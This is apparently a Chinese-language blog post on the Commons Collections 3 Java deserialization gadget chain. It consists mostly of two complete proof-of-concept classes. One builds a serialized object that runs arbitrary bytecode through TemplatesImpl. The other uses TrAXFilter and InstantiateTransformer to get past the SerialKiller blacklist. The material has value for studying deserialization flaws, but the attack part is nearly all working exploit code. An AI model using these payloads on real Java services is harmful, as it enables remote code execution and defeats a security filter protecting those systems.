CC3 Simple

CC3可以执行任意的字节码,并且绕过SerialKiller的一些规则,先看如何实现执行任意字节码:
思路很简单,之前的链子是利用transformers数组执行Runtime.exec(“calc.exe”); 现在换一个思路用transformers执行TemplatesImpl#newTransformer即可,

  1. public class cc3_simple {
  2.     public static byte[] payload() throws Exception {
  3.         ClassPool pool = ClassPool.getDefault();
  4.         CtClass ct = pool.get(bad.evilClz.class.getName());
  5.         byte[] shellcode = ct.toBytecode();
  7.         TemplatesImpl tmpl = new TemplatesImpl();
  8.         Reflections.setFieldValue(tmpl,"_bytecodes",new byte[][] {shellcode});
  9.         Reflections.setFieldValue(tmpl,"_name","testName");
  10.         Reflections.setFieldValue(tmpl,"_tfactory",new TransformerFactoryImpl());
  11.         Transformer[] transformers = new Transformer[]{
  12.                 new ConstantTransformer(tmpl),
  13.                 new InvokerTransformer("newTransformer",null,null),
  14.         };
  15.         Transformer transformerChain = new ChainedTransformer(new Transformer[]{});
  17.         Map map = new HashMap();
  18.         Map transformedMap = TransformedMap.decorate(map,transformerChain,transformerChain);
  19.         map.put("value",0);
  20.         Class clz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  21.         Constructor constructor = clz.getDeclaredConstructor(Class.class, Map.class);
  22.         constructor.setAccessible(true);
  23.         Object obj = constructor.newInstance(Retention.class,transformedMap);
  25.         Reflections.setFieldValue(transformerChain,"iTransformers",transformers);
  27.         return Serializer.Serialize(obj);
  28.     }
  29. }

CC3 Pro

绕过SerialKiller中的对InvokerTransformer的黑名单限制,
利用了 com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter 这个类, 这个类在初始化的时候会自动调用newTransformer方法:
image.png
用到了一个新的Transformer: InstantiateTransformer
transformers链构造如下:

  1. Transformer[] transformers = new Transformer[]{
  2.         new ConstantTransformer(TrAXFilter.class),
  3.         new InstantiateTransformer(
  4.                 new Class[] { Templates.class },
  5.                 new Object[] { tmpl }),
  6. };

完整POC:

  1. public class cc3_pro {
  2.     public static byte[] payload() throws Exception {
  3.         ClassPool pool = ClassPool.getDefault();
  4.         CtClass ct = pool.get(bad.evilClz.class.getName());
  5.         byte[] shellcode = ct.toBytecode();
  7.         TemplatesImpl tmpl = new TemplatesImpl();
  8.         Reflections.setFieldValue(tmpl,"_bytecodes",new byte[][] {shellcode});
  9.         Reflections.setFieldValue(tmpl,"_name","testName");
  10.         Reflections.setFieldValue(tmpl,"_tfactory",new TransformerFactoryImpl());
  11.         Transformer[] transformers = new Transformer[]{
  12.                 new ConstantTransformer(TrAXFilter.class),
  13.                 new InstantiateTransformer(
  14.                         new Class[] { Templates.class },
  15.                         new Object[] { tmpl }),
  16.         };
  18.         Transformer transformerChain = new ChainedTransformer(new Transformer[]{});
  19.         Map map = new HashMap();
  20.         Map transformedMap = TransformedMap.decorate(map,transformerChain,transformerChain);
  21.         map.put("value",0);
  22.         Class clz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  23.         Constructor constructor = clz.getDeclaredConstructor(Class.class, Map.class);
  24.         constructor.setAccessible(true);
  25.         Object obj = constructor.newInstance(Retention.class,transformedMap);
  27.         Reflections.setFieldValue(transformerChain,"iTransformers",transformers);
  28.         return Serializer.Serialize(obj);
  29.     }
  30. }